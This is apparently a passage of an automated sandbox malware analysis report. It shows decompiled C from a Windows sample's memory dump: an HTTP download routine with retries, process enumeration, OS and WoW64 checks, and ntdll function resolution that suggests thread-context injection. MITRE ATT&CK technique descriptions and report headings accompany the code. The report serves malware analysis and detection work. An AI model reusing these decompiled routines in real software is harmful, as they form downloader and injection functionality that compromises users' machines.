					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E013C17B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E013C4B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E013C4B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}

0x013c4de0
0x013c4de0
0x013c4de0
0x013c4df9
0x013c4dfe
0x013c4e03
0x013c4e06
0x013c4e0c
0x013c4e11
0x013c4e17
0x013c4e1d
0x013c4e28
0x013c4e2a
0x013c4e2d
0x013c4e2f
0x013c4e8d
0x013c4e9a
0x013c4e9f
0x013c4ea2
0x013c4ea5
0x013c4eb7
0x013c4ebc
0x013c4ebf
0x013c4ec2
0x013c4ec9
0x013c4ed9
0x013c4ede
0x013c4ede
0x013c4ee1
0x013c4ee8
0x013c4ef2
0x013c4ef7
0x013c4ef7
0x013c4efa
0x013c4f01
0x013c4f11
0x013c4f16
0x013c4f16
0x013c4f19
0x013c4f20
0x013c4f29
0x013c4f30
0x013c4f35
0x013c4f38
0x013c4f3f
0x013c4f41
0x013c4f48
0x013c4f56
0x013c4f5b
0x013c4f5e
0x013c4f60
0x013c4f70
0x013c4f75
0x013c4f75
0x013c4f60
0x013c4f48
0x013c4f3f
0x013c4f78
0x013c4f7f
0x013c4f8f
0x013c4f94
0x013c4f94
0x013c4f9d
0x013c4fa9
0x013c4fb5
0x013c4fc1
0x013c4fc7
0x013c4fcd
0x013c4fd3
0x013c4fd5
0x013c4fe3
0x013c4fe8
0x013c4ff5
0x013c4ea7
0x013c4ea7
0x00000000
0x013c4eac
0x013c4e31
0x013c4e36
0x013c4e42
0x013c4e44
0x013c4e49
0x00000000
0x013c4e4b
0x013c4e55
0x013c4e5a
0x013c4e5d
0x013c4e5f
0x013c4eb0
0x013c4eb6
0x013c4e61
0x013c4e61
0x013c4e6a
0x013c4e6c
0x013c4e6f
0x013c4e71
0x00000000
0x013c4e73
0x013c4e78
0x013c4e84
0x013c4e86
0x013c4e8b
0x00000000
0x00000000
0x00000000
0x00000000
0x013c4e8b
0x013c4e71
0x013c4e5f
0x013c4e49

APIs

Part of subcall function 013C4B00: InternetCrackUrlA.WININET(73BCEA30,00000000,?,?,00000000,00000000), ref: 013C4B57

Sleep.KERNEL32(00002710,?,?,73BCEA30,00000000), ref: 013C4E36

Part of subcall function 013C4B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 013C4B9D

Part of subcall function 013C4B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 013C4BCB
Part of subcall function 013C4B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 013C4BE5

Sleep.KERNEL32(00002710,?,?,?,?,?,?,73BCEA30,00000000), ref: 013C4E78

Part of subcall function 013C4B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,013CA200,846CF300,00000000), ref: 013C4C52
Part of subcall function 013C4B00: InternetQueryOptionA.WININET(00000000,0000001F,73BCEA30,00000000), ref: 013C4C8C
Part of subcall function 013C4B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 013C4CAA
Part of subcall function 013C4B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 013C4CC1
Part of subcall function 013C4B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 013C4CF3
Part of subcall function 013C4B00: InternetCloseHandle.WININET(00000CC8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013C4D9A
Part of subcall function 013C4B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013C4D9F

Strings

d572da9202196121d952231f26d65d07, xrefs: 013C4F41, 013C4F51
d06ed635-68f6-4e9a-955c-4899f5f57b9a, xrefs: 013C4FDD
FALSE, xrefs: 013C4E4B
FALSE, xrefs: 013C4E50

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
String ID: FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07
API String ID: 581717041-1944389977
Opcode ID: 3613fce4b84a5f1499c42ac11c845d97e279af8297b3607fbc9b550bc7902c5c
Instruction ID: f93c9b21064d18a9b54828ece314e3c452a4aa7760b6fa2a070f2a5f6eac33e5
Opcode Fuzzy Hash: 3613fce4b84a5f1499c42ac11c845d97e279af8297b3607fbc9b550bc7902c5c
Instruction Fuzzy Hash: C251C5B2D012269BEB31DB6CDC44FDB77E86B14A18F0505A9D94C93241EB34EE988B91

Uniqueness

Uniqueness Score: -1.00%

Function 013C7EF0, Relevance: 9.1, APIs: 6, Instructions: 64
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013C7EF0(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t13;
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;

				_v300 = 0x128;
				_t29 = CreateToolhelp32Snapshot(2, 0);
				if(_t29 != 0xffffffff) {
					Process32First(_t29,  &_v300);
					_t26 = _a4;
					_t13 = E013C1740(_a4,  &_v264);
					_t31 = _t30 + 8;
					if(_t13 == 0) {
						L7:
						CloseHandle(_t29);
						return _v292;
					} else {
						if(Process32Next(_t29,  &_v300) == 0) {
							L6:
							CloseHandle(_t29);
							return 0;
						} else {
							while(1) {
								_t21 = E013C1740(_t26,  &_v264);
								_t31 = _t31 + 8;
								if(_t21 == 0) {
									goto L7;
								}
								if(Process32Next(_t29,  &_v300) != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							goto L7;
						}
					}
				} else {
					return 0;
				}
				L8:
			}

0x013c7efe
0x013c7f0d
0x013c7f12
0x013c7f24
0x013c7f29
0x013c7f34
0x013c7f39
0x013c7f3e
0x013c7f85
0x013c7f86
0x013c7f97
0x013c7f40
0x013c7f4f
0x013c7f76
0x013c7f77
0x013c7f84
0x013c7f51
0x013c7f51
0x013c7f59
0x013c7f5e
0x013c7f63
0x00000000
0x00000000
0x013c7f74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013c7f74
0x00000000
0x013c7f51
0x013c7f4f
0x013c7f14
0x013c7f1a
0x013c7f1a
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 013C7F08
Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 013C7F24
Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 013C7F48
Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 013C7F6D
CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 013C7F77

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2284531361-0
Opcode ID: f18506dfd32b0a38f716bb3439e1bc360385d6971faf1eadf6711cc59c0325ed
Instruction ID: 5451b7905d7a9118e9d67ddc4f8204a45bc46b319fc098df934ce7f6406f47be
Opcode Fuzzy Hash: f18506dfd32b0a38f716bb3439e1bc360385d6971faf1eadf6711cc59c0325ed
Instruction Fuzzy Hash: 971108329010295BDB20A62CAC84FFEB3ACDF59769F0001E9ED48D2040EB31DE558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 013C8CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E013C8CE0() {
				_Unknown_base(*)()* _t2;
				signed int _t3;
				signed int _t5;
				void* _t9;

				 *0x1592e0c = 0x11c;
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x1592e0c);
				}
				_t3 =  *0x1592e10;
				if(_t3 == 0) {
					L22:
					return _t3;
				} else {
					_t5 = _t3 << 0x00000008 |  *0x1592e14;
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {
							 *0x1592e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {
							_t3 =  *0x1592e18;
							if(_t3 < 0x3fab) {
								if(_t3 < 0x3ad7) {
									if(_t3 < 0x3839) {
										if(_t3 < 0x295a) {
											goto L22;
										} else {
											 *0x1592e08 = 5;
											return _t3;
										}
									} else {
										 *0x1592e08 = 6;
										return _t3;
									}
								} else {
									 *0x1592e08 = 7;
									return _t3;
								}
							} else {
								 *0x1592e08 = 8;
								return _t3;
							}
						} else {
							goto L12;
						}
					} else {
						if(_t9 == 0) {
							 *0x1592e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {
								 *0x1592e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {
									L12:
									 *0x1592e08 = 0;
									return _t5;
								} else {
									 *0x1592e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}

0x013c8cea
0x013c8cfb
0x013c8d03
0x013c8d0a
0x013c8d0a
0x013c8d0c
0x013c8d13
0x013c8dca
0x013c8dca
0x013c8d19
0x013c8d1c
0x013c8d22
0x013c8d27
0x013c8d5f
0x013c8dc0
0x00000000
0x013c8dc0
0x013c8d66
0x013c8d73
0x013c8d7d
0x013c8d8f
0x013c8da1
0x013c8db3
0x00000000
0x013c8db5
0x013c8db5
0x013c8dbf
0x013c8dbf
0x013c8da3
0x013c8da3
0x013c8dad
0x013c8dad
0x013c8d91
0x013c8d91
0x013c8d9b
0x013c8d9b
0x013c8d7f
0x013c8d7f
0x013c8d89
0x013c8d89
0x00000000
0x00000000
0x00000000
0x013c8d29
0x013c8d29
0x013c8d4f
0x013c8d59
0x013c8d2b
0x013c8d30
0x013c8d44
0x013c8d4e
0x013c8d32
0x013c8d37
0x013c8d68
0x013c8d68
0x013c8d72
0x013c8d39
0x013c8d39
0x013c8d43
0x013c8d43
0x013c8d37
0x013c8d30
0x013c8d29
0x013c8d27

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,013C8DD5,013C3448), ref: 013C8CF4
GetProcAddress.KERNEL32(00000000), ref: 013C8CFB

Strings

ntdll.dll, xrefs: 013C8CE5
RtlGetVersion, xrefs: 013C8CE0

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: 076da3587ad5f8b2d82c7816ed5ce7995925cbf3178897b929d5d880e34dda9e
Instruction ID: cac4891aaaa3f79ef7e7a2c349e99f4233f78dc7ed9a1410d43cfef05c18ee9e
Opcode Fuzzy Hash: 076da3587ad5f8b2d82c7816ed5ce7995925cbf3178897b929d5d880e34dda9e
Instruction Fuzzy Hash: D411DD75195204AFF725CF14D8DC7293AA5A350F09FAB48A8D110CA294C7FC8A99DB87

Uniqueness

Uniqueness Score: -1.00%

Function 013C8270, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E013C8270(void* __ecx, intOrPtr _a4) {
				char _v8;
				_Unknown_base(*)()* _t6;
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t8 =  *_t6(_a4,  &_v8);
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;
					}
				}
			}

0x013c827e
0x013c828c
0x013c8294
0x013c82a7
0x013c82ad
0x013c8296
0x013c829d
0x013c82a1
0x00000000
0x013c82a6
0x013c82a6
0x013c82a6
0x013c82a1

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,013C3432), ref: 013C8285
GetProcAddress.KERNEL32(00000000,?,?,013C3432), ref: 013C828C

Strings

IsWow64Process, xrefs: 013C8274
kernel32, xrefs: 013C8279

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 62914d36d35ccb83bdfd672f71c6a4d4f80da16049d19728b036b116f5011623
Instruction ID: 23cad50b0f04bc417db96da346340b3b0ecba905ae8ca04e1c9bc67fa676650f
Opcode Fuzzy Hash: 62914d36d35ccb83bdfd672f71c6a4d4f80da16049d19728b036b116f5011623
Instruction Fuzzy Hash: 8BE04F3064430DAFDB10CBE5DC0DAAE7BACDB41B49F4001DCF94892200EA71AF119750

Uniqueness

Uniqueness Score: -1.00%

Function 013C21A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E013C21A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				signed int _v16;
				void* _v20;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t22;
				void* _t24;
				short _t27;
				void* _t31;
				signed int _t37;
				signed int _t38;
				void _t40;
				signed int _t46;
				void* _t52;
				intOrPtr _t57;
				void* _t61;
				void* _t62;

				_t46 = __edx;
				_t22 =  *0x1591128; // 0x0
				_t62 = _t61 - 0x28;
				_t64 = _t22 |  *0x159112c;
				if((_t22 |  *0x159112c) != 0) {
					L3:
					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4);
					_t52 = _t24;
					__eflags = _t52;
					if(_t52 != 0) {
						_t2 = _t52 + 0x18; // 0x18
						_t57 = _t2;
						E013C17E0(_t57, _a12);
						asm("cdq");
						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
						 *(_t52 + 0x14) = _t46;
						_t27 = E013C1850(_t57);
						asm("xorps xmm0, xmm0");
						 *((short*)(_t52 + 8)) = _t27;
						 *((short*)(_t52 + 0xa)) = _t27;
						_t8 = _t52 + 8; // 0x8
						 *_t52 = 0;
						 *(_t52 + 4) = 0;
						asm("cdq");
						_v36 = _t8;
						_v32 = _t46;
						asm("cdq");
						_v20 = _t52;
						_v44 = _a4;
						_v40 = _a8;
						asm("movlpd [ebp-0x18], xmm0");
						_v16 = _t46;
						_t31 = E013C1D10( *0x1591128,  *0x159112c,  &_v44, 4);
						_t40 =  *_t52;
						_v8 = 0;
						_v8 =  *(_t52 + 4);
						VirtualFree(_t52, 0, 0x8000);
						__eflags = _t31;
						if(_t31 < 0) {
							__eflags = 0;
							return 0;
						} else {
							return _t40;
						}
					} else {
						__eflags = 0;
						return _t24;
					}
				} else {
					_t37 = E013C22B0(_t46, E013C1E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
					_t62 = _t62 + 0x10;
					 *0x1591128 = _t37;
					_t38 = _t37 | _t46;
					 *0x159112c = _t46;
					if(_t38 != 0) {
						goto L3;
					} else {
						return _t38;
					}
				}
			}

0x013c21a0
0x013c21a3
0x013c21a8
0x013c21ab
0x013c21b1
0x013c21e1
0x013c21f0
0x013c21f6
0x013c21f8
0x013c21fa
0x013c2208
0x013c2208
0x013c220c
0x013c2213
0x013c2215
0x013c2218
0x013c221b
0x013c2223
0x013c2226
0x013c222a
0x013c222e
0x013c2231
0x013c2237
0x013c223e
0x013c223f
0x013c2244
0x013c2247
0x013c2248
0x013c2257
0x013c2263
0x013c2266
0x013c226b
0x013c226e
0x013c2273
0x013c227a
0x013c2284
0x013c228f
0x013c2295
0x013c2297
0x013c22a9
0x013c22af
0x013c2299
0x013c22a4
0x013c22a4
0x013c21fc
0x013c21fc
0x013c2202
0x013c2202
0x013c21b3
0x013c21c4
0x013c21c9
0x013c21cc
0x013c21d1
0x013c21d3
0x013c21d9
0x00000000
0x013c21db
0x013c21e0
0x013c21e0
0x013c21d9

APIs

VirtualAlloc.KERNEL32(00000000,00000120,00003000,00000004,?,?,?,?,?,013C6208,?,?,NtGetContextThread,?,?,?), ref: 013C21F0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,013C6208,?), ref: 013C228F

Strings

ntdll.dll, xrefs: 013C21B3
LdrGetProcedureAddress, xrefs: 013C21BD

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID: LdrGetProcedureAddress$ntdll.dll
API String ID: 2087232378-1174695804
Opcode ID: f4f10cae51ed3e26452f37dd31ee1b30e198d67a400ba32c95089e0a8b70e070
Instruction ID: b14dd3e5dce72039ee169bc2287d2b37a2578b32a54b10381234a4bba75fa7c4
Opcode Fuzzy Hash: f4f10cae51ed3e26452f37dd31ee1b30e198d67a400ba32c95089e0a8b70e070
Instruction Fuzzy Hash: A63109B5E00616AFD710DF69DC807AAF7B5FF88724F11811EE918A7300D770A9109BD5

Uniqueness

Uniqueness Score: -1.00%

Function 013C16A0, Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013C16A0(void* _a4, long _a8) {
				long _t5;
				long _t9;

				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);
					return _t9;
				}
				return _t5;
			}

0x013c16b3
0x013c16b9
0x013c16bd
0x013c16ca
0x00000000
0x013c16d0
0x013c16d4

APIs

GetProcessHeap.KERNEL32(00000000,00000000,013C4D23,00000000,?,013C4D23,00000000,00000000), ref: 013C16AC
HeapReAlloc.KERNEL32(00000000,?,013C4D23,00000000,00000000), ref: 013C16B3
GetProcessHeap.KERNEL32(00000000,00000000,?,013C4D23,00000000,00000000), ref: 013C16C3
HeapFree.KERNEL32(00000000,?,013C4D23,00000000,00000000), ref: 013C16CA

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: a3fb2e58116172921ad8e54bd416092018347dbe0b490b0731771114974562ce
Instruction ID: 45c2bd544f20703c9036d3276261491a53c82c3b92947a3e5d6d819bca13c7ca
Opcode Fuzzy Hash: a3fb2e58116172921ad8e54bd416092018347dbe0b490b0731771114974562ce
Instruction Fuzzy Hash: F6E0B636500224BBCB222AE5A80CB9A3E2DAB087AAF064014FA0996104CA3299209B94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report LZF5sOWnss

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Cryptography:

Bitcoin Miner:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre